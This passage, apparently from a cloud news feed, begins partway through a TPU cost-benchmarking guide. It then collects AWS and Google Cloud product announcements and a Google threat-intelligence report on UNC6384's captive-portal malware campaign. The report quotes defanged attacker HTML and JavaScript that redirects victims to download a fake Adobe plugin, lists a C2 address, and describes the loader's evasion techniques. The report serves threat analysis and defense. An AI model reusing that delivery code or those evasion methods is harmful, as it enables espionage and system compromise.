The results are definitive. For this specific workload (serving the gemma-3-27b-it model with long contexts), the v6e-4 configuration is the winner.
Not only does the v6e-4 instance provide higher throughput than our accelerator-optimized instance, but it does so at a reduced cost. This translates to massive savings at higher scales.
Looking at the performance-per-dollar, the advantage is clear:
The v6e-4 configuration delivers almost twice the performance for every dollar spent, making it the superior, efficient choice for deploying this workload.
Final Reminder
This benchmarking and tuning process demonstrates the critical importance of evaluating different hardware options to find the optimal balance of performance and cost for your specific AI workload. We need to keep in mind the following sizing these workloads:
If our workload changed (e.g., input length, output length, prefix-caching percentage, or our requirements) the outcome of this guide may be different – the anonymized candidate could outperform v6e in several scenarios depending on the workload.
If we considered the other possible accelerators mentioned above, we may find a more cost effective approach that meets our requirements.
Finally, we covered a relatively small parameter space in our auto_tune.sh script for this example – perhaps if we searched a larger space we may have found a configuration with even greater cost savings potential.
Additional Resources
The following is a collection of additional resources to help you complete the guide and better understand the concepts described.
Amazon RDS for MariaDB now supports MariaDB major version 11.8, the latest long-term maintenance release from the MariaDB community. This release supports MariaDB 11.8.3 minor version.
Amazon RDS for MariaDB 11.8 now supports the MariaDB Vector feature, allowing you to store vector embeddings in your database and use retrieval-augmented generation (RAG) when building your Artificial Intelligence (AI) applications. You can use MariaDB Vector to build generative AI capabilities into your e-commerce, media, health applications, and more to find similar items within a catalog. MariaDB 11.8 also introduces the ability to limit maximum size of temporary files and tables, allowing you to better manage your databases’ storage and prevent potential issues caused by oversized temporary objects. Learn more about these community enhancements in the MariaDB 11.8 release notes and RDS MariaDB release notes.
Amazon RDS for MariaDB makes it straightforward to set up, operate, and scale MariaDB deployments in the cloud. Create or update a fully managed Amazon RDS for MariaDB 11.8 database in the Amazon RDS Management Console.
In March 2025, Google Threat Intelligence Group (GTIG) identified a complex, multifaceted campaign attributed to the PRC-nexus threat actor UNC6384. The campaign targeted diplomats in Southeast Asia and other entities globally. GTIG assesses this was likely in support of cyber espionage operations aligned with the strategic interests of the People’s Republic of China (PRC).
The campaign hijacks target web traffic, using a captive portal redirect, to deliver a digitally signed downloader that GTIG tracks as STATICPLUGIN. This ultimately led to the in-memory deployment of the backdoor SOGU.SEC (also known as PlugX). This multi-stage attack chain leverages advanced social engineering including valid code signing certificates, an adversary-in-the-middle (AitM) attack, and indirect execution techniques to evade detection.
Google is actively protecting our users and customers from this threat. We sent government-backed attacker alerts to all Gmail and Workspace users impacted by this campaign. We encourage users to enable Enhanced Safe Browsing for Chrome, ensure all devices are fully updated, and enable 2-Step Verification on accounts. Additionally, all identified domains, URLs, and file hashes have been added to the Google Safe Browsing list of unsafe web resources. Google Security Operations (SecOps) has also been updated with relevant intelligence, enabling defenders to hunt for this activity in their environments.
aside_block
<ListValue: [StructValue([(‘title’, ‘Webinar: Defending Against Sophisticated and Evolving PRC-Nexus Espionage Campaigns’), (‘body’, <wagtail.rich_text.RichText object at 0x3ebcfc7c4af0>), (‘btn_text’, ‘Register now’), (‘href’, ‘https://www.brighttalk.com/webcast/7451/651182?utm_source=blog’), (‘image’, None)])]>
Overview
This blog post presents our findings and analysis of this espionage campaign, as well as the evolution of the threat actor’s operational capabilities. We examine how the malware is delivered, how the threat actor utilized social engineering and evasion techniques, and technical aspects of the multi-stage malware payloads.
In this campaign, the malware payloads were disguised as either software or plugin updates and delivered through UNC6384 infrastructure using AitM and social engineering tactics. A high level overview of the attack chain:
The target’s web browser tests if the internet connection is behind a captive portal;
An AitM redirects the browser to a threat actor controlled website;
The first stage malware, STATICPLUGIN, is downloaded;
STATICPLUGIN then retrieves an MSI package from the same website;
Finally, CANONSTAGER is DLL side-loaded and deploys the SOGU.SEC backdoor.
Figure 1: Attack chain diagram
Malware Delivery: Captive Portal Hijack
GTIG discovered evidence of a captive portal hijack being used to deliver malware disguised as an Adobe Plugin update to targeted entities. A captive portal is a network setup that directs users to a specific webpage, usually a login or splash page, before granting internet access. This functionality is intentionally built into all web browsers. The Chrome browser performs an HTTP request to a hardcoded URL (“http://www.gstatic.com/generate_204”) to enable this redirect mechanism.
While “gstatic.com” is a legitimate domain, our investigation uncovered redirect chains from this domain leading to the threat actor’s landing webpage and subsequent malware delivery, indicating an AitM attack. We assess the AitM was facilitated through compromised edge devices on the target networks. However, GTIG did not observe the attack vector used to compromise the edge devices.
Figure 2: Captive portal redirect chain
Fake Plugin Update
After being redirected, the threat actor attempts to deceive the target into believing that a software update is needed, and to download the malware disguised as a “plugin update”. The threat actor used multiple social engineering techniques to form a cohesive and credible update theme.
The landing webpage resembles a legitimate software update site and uses an HTTPS connection with a valid TLS certificate issued by Let’s Encrypt. The use of HTTPS offers several advantages for social engineering and malware delivery. Browser warning messages, such as “Not Secure” and “Your connection is not private”, will not be displayed to the target, and the connection to the website is encrypted, making it more difficult for network-based defenses to inspect and detect the malicious traffic. Additionally, the malware payload is disguised as legitimate software and is digitally signed with a certificate issued by a Certificate Authority.
$ openssl x509 -in mediareleaseupdates.pem -noout -text -fingerprint -sha256
Certificate:
Data:
Version: 3 (0x2)
Serial Number:
05:23:ee:fd:9f:a8:7d:10:b1:91:dc:34:dd:ee:1b:41:49:bd
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R10
Validity
Not Before: May 17 16:58:11 2025 GMT
Not After : Aug 15 16:58:10 2025 GMT
Subject: CN=mediareleaseupdates[.]com
sha256 Fingerprint=6D:47:32:12:D0:CB:7A:B3:3A:73:88:07:74:5B:6C:F1:51:A2:B5:C3:31:65:67:74:DF:59:E1:A4:E2:23:04:68
Figure 3: Website TLS certificate
The initial landing page is completely blank with a yellow bar across the top and a button that reads “Install Missing Plugins…”. If this technique successfully deceives the target into believing they need to install additional software, they may be more willing to manually bypass host-based Windows security protections to execute the delivered malicious payload.
Figure 4: Malware landing page
In the background, Javascript code is loaded from a script file named “style3.js” hosted on the same domain as the HTML page. When the target clicks the install button “myFunction”, which is located in the loaded script, is executed.
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Additional plugins are required to display all the media on this page</title>
<script type="text/javascript" src="https[:]//mediareleaseupdates[.]com/style3.js"> </script>
</head>
<body><div id="adobe update" onclick="myFunction()"...
Figure 5: Javascript from AdobePlugins.html
Inside of “myFunction” another image is loaded to display as the background image on the webpage. The browser window location is also set to the URL of an executable, again hosted on the same domain.
function myFunction()
{
var img = new Image();
img.src ="data:image/png;base64,iVBORw0KGgo[cut]
...
document.body.innerHTML = '';
document.body.style.backgroundImage = 'url(' + img.src + ')';
...
window.location.href = "https[:]//mediareleaseupdates[.]com/AdobePlugins.exe";
}
Figure 6: Javascript from style3.js
This triggers the automatic download of “AdobePlugins.exe” and a new background image to be displayed on the webpage. The image shows instructions for how to execute the downloaded binary and bypass potential Windows security protections.
Figure 7: Malware landing page post-download
When the downloaded executable is run, the fake install prompt seen in the above screenshot for “STEP 2” is displayed on screen, along with “Install” and “Cancel” options. However, the SOGU.SEC payload is likely already running on the target device, as neither button triggers any action relevant to the malware.
Malware Analysis
Upon successful delivery to the target Windows system, the malware initiates a multi-stage deployment chain. Each stage layers tactics designed to evade host-based defenses and maintain stealth on the compromised system. Finally, a novel side-loaded DLL, tracked as CANONSTAGER, concludes with in-memory deployment of the SOGU.SEC backdoor, which then establishes communication with the threat actor’s command and control (C2) server.
Digitally Signed Downloader: STATICPLUGIN
The downloaded “AdobePlugins.exe” file is a first stage malware downloader. The file was signed by Chengdu Nuoxin Times Technology Co., Ltd. with a valid certificate issued by GlobalSign. Signed malware has the major advantage of being able to bypass endpoint security protections that typically trust files with valid digital signatures. This gives the malware false legitimacy, making it harder for both users and automated defenses to detect.
The binary was code signed on May 9th, 2025, possibly indicating how long this version of the downloader has been in use. While the signing certificate expired on July 14th, 2025 and is no longer valid, it may be easy for the threat actor to re-sign new versions of STATICPLUGIN with similarly obtained certificates.
Figure 8: Downloader with valid digital signature
STATICPLUGIN implements a custom TForm which is designed to masquerade as a legitimate Microsoft Visual C++ 2013 Redistributables installer. The malware uses the Windows COM Installer object to download another file from “https[:]//mediareleaseupdates[.]com/20250509[.]bmp”. However, the “BMP” file is actually an MSI package containing three files. After installation of these files, CANONSTAGER is executed via DLL side-loading.
Certificate Subscriber — Chengdu Nuoxin Times Technology Co., Ltd
Our investigation found this is not the first suspicious executable signed with a certificate issued to Chengdu Nuoxin Times Technology Co., Ltd. GTIG is currently tracking 25 known malware samples signed by this Subscriber that are in use by multiple PRC-nexus activity clusters. Many examples of these signed binaries are available in VirusTotal.
GTIG has previously investigated two additional campaigns using malware signed by this entity. While GTIG does not attribute these other campaigns to UNC6384, they have multiple similarities and TTP overlaps with this UNC6384 campaign, in addition to using the same code signing certificates.
Delivery through web-based redirects
Downloader first stage, sometimes packaged in an archive.
In-memory droppers and memory-only backdoor payloads
Masquerading as legitimate applications or updates
Targeting in Southeast Asia
It remains an open question how the threat actors are obtaining these certificates. The Subscriber organization may be a victim with compromised code signing material. However, they may also be a willing participant or front company facilitating cyber espionage operations. Malware samples signed by Chengdu Nuoxin Times Technology Co., Ltd date back to at least January 2023. GTIG is continuing to monitor the connection between this entity and PRC-nexus cyber operations.
Malicious Launcher: CANONSTAGER
Once CANONSTAGER is executed, its ultimate purpose is to surreptitiously execute the encrypted payload, a variant of SOGU tracked as SOGU.SEC. CANONSTAGER implements a control flow obfuscation technique using custom API hashing and Thread Local Storage (TLS). The launcher also abuses legitimate Windows features such as window procedures, message queues, and callback functions to execute the final payload.
API Hashing and Thread Local Storage
Thread Local Storage (TLS) is intended to provide each thread in a multi-threaded application its own private data storage. CANONSTAGER uses the TLS array data structure to store function addresses resolved by its custom API hashing algorithm. The function addresses are later called throughout the binary from offsets into the TLS array.
In short, the API hashing hides which Windows APIs are being used, while the TLS array provides a stealthy location to store the resolved function addresses. Use of the TLS array for this purpose is unconventional. Storing function addresses here may be overlooked by analysts or security tooling scrutinizing more common data storage locations.
Below is an example of CANONSTAGER resolving and storing the GetCurrentDirectoryWfunction address.
Resolve the GetCurrentDirectoryW hash (0x6501CBE1)
Get the location of the TLS array from the Thread Information Block (TIB)
Move the resolved function address into offset 0x8 of the TLS array
Figure 9: Example of storing function addresses in TLS array
Indirect Code Execution
CANONSTAGER hides its launcher code in a custom window procedure and triggers its execution indirectly using the Windows message queue. Using these legitimate Windows features lowers the likelihood of security tools detecting the malware and raising alerts. It also obscures the malware’s control flow by “hiding” its code inside of the window procedure and triggering execution asynchronously.
Enters a message loop to receive and dispatch messages to the created window;
Creates a new thread to decrypt “cnmplog.dat” as SOGU.SEC when the window receives the WM_SHOWWINDOW message; then
Executes SOGU.SEC in-memory with an EnumSystemGeoID callback.
Figure 10: Overview of CANONSTAGER execution using Windows message queue
Window Procedure
On a Windows system, every window class has an associated window procedure. The procedure allows programmers to define a custom function to process messages sent to the specified window class.
CANONSTAGER creates an Overlapped Window with a registered WNDCLASS structure. The structure contains a callback function to the programmer-defined window procedure for processing messages. Additionally, the window is created with a height and width of zero to remain hidden on the screen.
Inside the window procedure, there is a check for message type 0x0018 (WM_SHOWWINDOW). When a message of this type is received, a new thread is created with a function that decrypts and launches the SOGU.SEC payload. For any message type other than 0x0018 (or 0x2 to ExitProcess), the window procedure calls the default handler (DefWindowProc), ignoring the message.
Message Queue
Windows applications use Message Queues for asynchronous communication. Both user applications and the Windows system can post messages to Message Queues. When a message is posted to an application window, the system calls the associated window procedure to process the message.
In order to trigger the malicious window procedure, CANONSTAGER uses the ShowWindow function to send a WM_SHOWWINDOW (0x0018) message to its newly created window via the Message Queue. Since the system, or other applications, may also post messages to the CANONSTAGER’s window, a standard Windows message loop is entered. This allows all posted messages to be sent, including the intended WM_SHOWWINDOW message.
GetMessageW – retrieve all messages in the thread’s message queue.
TranslateMessage – Convert message from a “virtual-key” to a “character message”.
DispatchMessage – Delivers the message to the specific function (WindowProc) that handles messages for the window targeted by that message.
Loop back to 1, until all messages are dispatched.
Deploying SOGU.SEC
After the correct message type is received by the window procedure, CANONSTAGER moves on to deploying its SOGU.SEC payload with the following steps:
Read the encrypted “cnmplog.dat” file, packaged in the downloaded MSI;
Decrypt the file with a hardcoded 16-byte RC4 key;
Execute the decrypted payload using an EnumSystemsGeoID callback function.
Figure 11: Callback function executing SOGU.SEC
UNC6384 has previously used both payload encryption and callback functions to deploy SOGU.SEC. These techniques are used to hide malicious code, evade detection, obfuscate control flow, and blend in with normal system activity. Additionally, all of these steps are done in-memory, avoiding endpoint file-based detections.
The Backdoor: SOGU.SEC
SOGU.SEC is a distinct variant of SOGU and is commonly deployed by UNC6384 in cyber espionage activity. This is a sophisticated, and heavily obfuscated, malware backdoor with a wide range of capabilities. It can collect system information, upload and download files from a C2, and execute a remote command shell. In this campaign, SOGU.SEC was observed communicating directly with the C2 IP address “166.88.2[.]90” using HTTPS.
Attribution
GTIG attributes this campaign to UNC6384, a PRC-nexus cyber espionage group believed to be associated with the PRC-nexus threat actor TEMP.Hex (also known as Mustang Panda). Our attribution is based on similarities in tooling, TPPs, targeting, and overlaps in C2 infrastructure. UNC6384 and TEMP.Hex are both observed to target government sectors, primarily in Southeast Asia, in alignment with PRC strategic interests. Both groups have also been observed to deliver SOGU.SEC malware from DLL side-loaded malware launchers and have used the same C2 infrastructure.
Conclusion
This campaign is a clear example of the continued evolution of UNC6384’s operational capabilities and highlights the sophistication of PRC-nexus threat actors. The use of advanced techniques such as AitM combined with valid code signing and layered social engineering demonstrates this threat actor’s capabilities. This activity follows a broader trend GTIG has observed of PRC-nexus threat actors increasingly employingstealthy tactics to avoid detection.
GTIG actively monitors ongoing threats from actors like UNC6384 to protect users and customers. As part of this effort, Google continuously updates its protections and has taken specific action against this campaign.
Acknowledgment
A special thanks to Jon Daniels for your contributions.
Appendix: Indicators of Compromise
A Google Threat Intelligence (GTI) collection of related IOCs is available to registered users.
Amazon Bedrock Data Automation (BDA) now supports five additional languages for document workloads in addition to English: Portuguese, French, Italian, Spanish, and German. With this launch, customers can process documents in these new languages and create blueprints prompts and instructions in these new languages when using BDA Custom Output for documents. Customers using BDA Standard Output will now receive document summaries and figure captions in the detected language of the document.
BDA is a feature of Amazon Bedrock that enables developers to automate the generation of valuable insights from unstructured multimodal content such as documents, images, video, and audio to build GenAI-based applications. By leveraging BDA, developers can reduce development time and effort, making it easier to build intelligent document processing, media analysis, and other multimodal data-centric automation solutions. BDA can be used as a standalone feature or as a parser in Amazon Knowledge Bases RAG workflows.
BDA Documents support for these 5 new languages is now generally available in Europe (Frankfurt), Europe (London), Europe (Ireland), Asia Pacific (Mumbai) and Asia Pacific (Sydney), US West (Oregon), US East (N. Virginia) and AWS GovCloud (US-West) Regions. To learn more, visit the Bedrock Data Automation product page and the Amazon Bedrock Pricing page.
Amazon Bedrock Data Automation (BDA) is now generally available in the AWS GovCloud (US-West) Region.
BDA is a feature of Amazon Bedrock that enables developers to automate the generation of valuable insights from unstructured multimodal content such as documents, images, video, and audio to build GenAI-based applications. By leveraging BDA, developers can reduce development time and effort, making it easier to build intelligent document processing, media analysis, and other multimodal data-centric automation solutions. BDA can be used as a standalone feature or as a parser in Amazon Knowledge Bases RAG workflows.
With this launch, BDA is now available in a total of 8 AWS Regions: Europe (Frankfurt), Europe (London), Europe (Ireland), Asia Pacific (Mumbai) and Asia Pacific (Sydney), US West (Oregon), US East (N. Virginia) and AWS GovCloud (US-West) Regions. To learn more, visit the Bedrock Data Automation product page and the Amazon Bedrock Pricing page.
Debugging in a complex, distributed cloud environment can feel like searching for a needle in a haystack. The sheer volume of data, intertwined dependencies, and ephemeral issues make traditional troubleshooting methods time-consuming and often reactive. Just as modern software development demands more context for effective debugging, so too does cloud operations.
Gemini Cloud Assist, a key product in the Google Cloud with Gemini portfolio, simplifies the way you manage your applications with AI-powered assistance to help you design, deploy, and optimize your apps, so you can reach your efficiency, cost, reliability, and security goals.
Then there’s Gemini Cloud Assist investigations, a root-cause analysis (RCA) AI agent for troubleshooting infrastructure and applications that is now available in preview.
When you encounter an issue, you can initiate an investigation from various places like the Logs Explorer, Cloud Monitoring alerts, or directly from the Gemini chat panel. Cloud Assist then analyzes data from multiple sources, including logs, configurations, and metrics, to produce ranked and filtered “Observations” that provide insights into your environment’s state. It synthesizes these observations to diagnose probable root causes, explains the context, and recommends the next steps or fixes to resolve the problem. If you need more help, your investigation, along with all its context, can be seamlessly transferred into a Google Cloud support case to expedite resolution with a support engineer.
How Gemini Cloud Assist investigations works
Gemini Cloud Assist investigations helps to find the root cause of an issue using a combination of capabilities:
Programmatic, proactive, and interactive access: Trigger or consume your investigation through API calls, chat menu, or UI for proactive or interactive troubleshooting.
Contextualization: Investigations discover the most relevant resources, data sources, and APIs in your environment to provide focused troubleshooting.
Comprehensive signal analysis: Investigations perform deep analysis in parallel across Cloud Logs, Cloud Asset Inventory, App Hub, Metrics, Errors, and Log Themes to uncover anomalies, configuration changes, performance bottlenecks, and recurring issues.
AI-powered insights and recommendations: Utilizing specialized knowledge sources, like Google Cloud support knowledgebases and internal runbooks, investigations generate probable root cause and actionable recommendations.
Interactive collaboration – Chat with and share investigations across your team for collaborative troubleshooting between you, your team, and Gemini Cloud Assist.
Handoff to Google Cloud Support: Convert your investigation directly to a support case without losing any time or context.
Programmatic, proactive, and interactive investigations
Early users are thrilled with the speed and effectiveness with which Cloud Assist investigations helps them troubleshoot and resolve tough problems.
“At ZoomInfo, maintaining uptime is critical, but equally important is ensuring our engineers can swiftly and effectively troubleshoot complex issues. By integrating Gemini Cloud Assist investigations early into our development process, we’ve accelerated troubleshooting across all levels of our engineering team. Engineers at every experience level can now rapidly diagnose and resolve problems, reducing some resolution times from hours to minutes. This efficiency enables our teams to spend more energy innovating and less time on reactive problem-solving. Gemini Cloud Assist investigations isn’t just a troubleshooting aid; it’s a key driver of productivity and innovation.” – Yasin Senturk, DevOps Engineer at ZoomInfo
“I’m really impressed by how Gemini Cloud Assist Investigations feature in 2 minutes turned over with some valid suggestions on the potential root causes, and the first one being the actual culprit! I was able to mitigate the whole issue within an hour. Gemini Cloud Assist really saved my weekend!” – Chuanzhen Wu, SRE, Google Waze
Let’s walk through Gemini Cloud Assist investigations’ capabilities in a bit more detail.
Programmatic, proactive, and interactive access You can start an investigation directly from various points within Google Cloud, such as error messages in Logs Explorer or specific product pages (like Google Kubernetes Engine or Cloud Run), or from the central Investigations page, where you can provide context like error messages, affected resources, and observation time. Gemini Cloud Assist investigations also provides an API, allowing you to integrate it into existing workflows such as Slack or other incident management tools. If the root cause of an issue requires further assistance, you can trigger a Google Cloud support case with the Investigation response so support engineers can proceed from that point.
Contextualization Investigations can start with a natural language description, error message, log snippets, or any combination of information that you have about your issue. It starts by gathering the initial context related to your issue, then builds a topology of relevant resources and all the associated data sources that might provide insights to the root cause.
Investigations uses both public and private knowledge, playbooks informed by Google SRE and Google Cloud Support issues, and your topology, grounding itself in similar issues before generating a troubleshooting plan for your issue. This context becomes key in providing focused and comprehensive signal analysis.
Comprehensive signal analysis Once the investigation runs, you’ll see the observations that it starts to collect from your project. The investigation goes beyond surface-level observations; it automatically analyzes critical data sources across your Google Cloud environment, including:
Google Cloud logs: Sifting through vast log data to identify anomalies and critical events
Cloud Asset Inventory: Understanding changes in your resource configurations and their potential impact
Metrics (coming soon): Correlating performance data to pinpoint resource exhaustion or unexpected behavior
Errors: Aggregating and categorizing errors to highlight patterns and recurring problems
Log themes: Identifying common patterns and themes within log data to provide a higher-level view of issues
AI-powered insights and recommendations Observations are the basis of Gemini Cloud Assist investigations’ root-cause insights and recommendations.Leveraging Gemini’s analytical capabilities, Cloud Assist synthesizes observations from disparate data sources, ranking and filtering information to focus on the most relevant details. Crucially, investigations draw upon differentiated knowledge sources and publicly available documentation, such as extensive Google Cloud support troubleshooting knowledge and internal runbooks, to generate highly accurate and relevant insights and observations. It then generates:
Probable root cause: Provides clear hypotheses about the underlying cause of the issue, complete with contextual explanations
Actionable recommendations: Offers concrete next steps for troubleshooting or even direct fixes, helping you resolve incidents faster
Handoff to Google Support teams If an issue proves particularly elusive, with the click of a button, investigations packages context, observations, and hypotheses into a support case, for faster issue resolution. This is why you might want to run an investigation before contacting Google support teams about an issue.
Get started with Gemini Cloud Assist investigations today
Ready to get to the root of your troubles faster? Try investigations now by investigating any error logs from the Log Explorer console. Or create an investigation directly and describe any issues you might be having.
Amazon Elastic Kubernetes Service (Amazon EKS) now supports Kubernetes namespace configuration for AWS and Community add-ons, providing you greater control over how add-ons are organized within your Kubernetes cluster.
With namespace configuration, you can now specify a custom namespace during add-on installation, enabling better organization and isolation of add-on objects within your EKS cluster. This flexibility helps you align add-ons with your operational needs and existing namespace strategy. Once an add-on is installed in a specific namespace, you must remove and recreate the add-on to change its namespace.
This feature is available through the AWS Management Console, Amazon EKS APIs, AWS Command Line Interface (CLI), and infrastructure as code tools like AWS CloudFormation. Namespace configuration for AWS and Community add-ons is now available in all commercial AWS Regions. To learn more, visit the Amazon EKS documentation.
Amazon RDS for PostgreSQL now supports delayed read replicas, allowing you to specify a minimum time period that a replica database lags behind a source database. This feature creates a time buffer that helps protect against data loss from human errors such as accidental table drops or unintended data modifications.
In disaster recovery scenarios, you can pause replication before problematic changes are applied, resume replication up to a specific log position, and promote the replica as your new primary database. This approach enables faster recovery compared to traditional point-in-time restore operations, which can take hours for large databases.
This feature is available in all AWS Regions where RDS for PostgreSQL is offered, including the AWS GovCloud (US) Regions, at no additional cost beyond standard RDS pricing. To learn more, visit the Amazon RDS for PostgreSQL documentation.
Starting today, Amazon Elastic Compute Cloud (Amazon EC2) R7g instances are available in the AWS Africa (Cape Town) region. These instances are powered by AWS Graviton3 processors that provide up to 25% better compute performance compared to AWS Graviton2 processors, and built on top of the the AWS Nitro System, a collection of AWS designed innovations that deliver efficient, flexible, and secure cloud services with isolated multi-tenancy, private networking, and fast local storage.
Amazon EC2 Graviton3 instances also use up to 60% less energy to reduce your cloud carbon footprint for the same performance than comparable EC2 instances. For increased scalability, these instances are available in 9 different instance sizes, including bare metal, and offer up to 30 Gbps networking bandwidth and up to 20 Gbps of bandwidth to the Amazon Elastic Block Store (EBS).
Amazon Relational Database Service (RDS) for DB2 now supports read replicas. Customers can add up to three read replicas for their database instance, and use the replicas to support read-only applications without overloading the primary database instance.
Customers can setup replicas in the same region or in a different region from the primary database instance. When a read replica is setup, RDS replicates changes asynchronously to the read replicas. Customers can run their read-only queries against the read replica without impacting performance of the primary database instance. Customers can also use read replicas for disaster recovery procedures by promoting a read replica to support both read and write operations.
Read replicas require IBM Db2 licenses for all vCPUs on replica instances. Customers can obtain On-Demand Db2 licenses from the AWS Marketplace, or use Bring Your Own License (BYOL). To learn more, refer to Amazon RDS for Db2 documentation and pricing pages.
Today, AWS announced the release of a model context protocol (MCP) server for Billing and Cost Management, now available in the AWS Labs GitHub repository. The Billing and Cost Management MCP server allows customers to analyze their historical spending, find cost optimization opportunities, and estimate the costs of new workloads using the AI agent or assistant of their choice.
Artificial intelligence is transforming the way that customers manage FinOps practices. While customers can access AI-powered cost analysis and optimization capabilities in Amazon Q Developer in the console, the Billing and Cost Management MCP server brings these capabilities to any MCP-compatible AI assistant or agent that customers may be using, such as Q Developer CLI tool, the Kiro IDE, Visual Studio Code, or Claude Desktop. This MCP server gives these clients rich capabilities to analyze historical and forecasted cost and usage data, identify cost optimization opportunities, understand AWS service pricing, find cost anomalies, and more. The MCP server not only provides access to AWS service APIs; it also provides a dedicated SQL-based calculation engine allowing AI assistants to perform reliable, reproducible calculations — ranging from period-over-period changes to unit cost metrics — and easily handle large volumes of cost and usage data.
You can download and integrate the open-source server with your preferred MCP-compatible AI assistant. The server connects securely to the AWS Billing and Cost Management services using standard AWS credentials with minimal configuration required. To get started, visit the AWS Labs GitHub repository.
Amazon SageMaker Unified Studio now offers a simplified file storage option in projects, providing data workers with an easier way to collaborate on their analytics and machine learning workflows without depending on Git. You can now choose between Git repositories (GitHub, GitLab or Bitbucket Cloud) or Amazon Simple Storage (S3) buckets for sharing code files between the various members of a project. While S3 is the default option, customers who want to use Git can still continue to have the same experience as they currently do.
With this launch, customers will see a consistent view of their files irrespective of the tool they are working in across SageMaker Unified Studio (such as JupyterLab, Code Editor or SQL query editor) making it easy to create, edit and share code. The S3 file storage option operates on a “last write wins” principle and supports basic file versioning when enabled by administrators. This option is particularly beneficial for data science teams who want to focus on their analytics and machine learning work without managing Git operations, while still maintaining a collaborative workspace for their project artifacts.
This feature is available in all AWS Regions where Amazon SageMaker Unified Studio is available. To learn more about storage options in SageMaker Unified Studio projects, see Managing Project Files in the Amazon SageMaker Unified Studio User Guide.
The Count Tokens API is now available in Amazon Bedrock, enabling you to determine the token count for a given prompt or input being sent to a specific model ID prior to performing any inference.
By surfacing a prompt’s token count, the Count Tokens API allows you to more accurately project your costs, and provides you with greater transparency and control over your AI model usage. It allows you to proactively manage your token limits on Amazon Bedrock, helping to optimize your usage and avoid unexpected throttling. It also helps ensure your workloads fit within a model’s context length limit, allowing for more efficient prompt optimization.
Amazon Verified Permissions now supports Cedar 4.5. This enables customers to use the latest Cedar features, including the “is” operator, which allows customers to grant access based on resource types. For example, in a petstore application, you can use the “is” operator to write a policy that only grants administrators permission to view a resource if that resource “is” an invoice. This addition enhances Cedar’s type system and helps catch potential type-related errors early in policy development. You can learn about other enhancements to Cedar on the Cedar releases page.
Amazon Verified Permissions is a permissions management and fine-grained authorization service for the applications that you build. Amazon Verified Permissions uses the Cedar policy language to enable developers and admins to define policy-based access controls using roles and attributes.
Amazon Verified Permissions supports Cedar 4.5 in all AWS Regions where the service is available. All new accounts and backward-compatible accounts have been automatically upgraded to Cedar-4, and no additional actions are required. For more information about Amazon Verified Permissions, visit the Verified Permissions product page.
Today, AWS announces the general availability of Neuron SDK 2.25.0, delivering improvements for inference workloads and performance monitoring on AWS Inferentia and Trainium instances. This latest release adds context and data parallelism support as well as chunked attention for long sequence processing in inference, and updates the neuron-ls and neuron-monitor APIs with more information on node affinities and device utilization, respectively.
This release also introduces automatic aliasing (Beta) for fast tensor operations, and adds improvements for disaggregated serving (Beta). Finally, it provides upgraded AMIs and Deep Learning Containers for inference and training workloads on Neuron.
Neuron 2.25.0 is available in all AWS Regions where Inferentia and Trainium instances are offered.
To learn more and for a full list of new features and enhancements, see: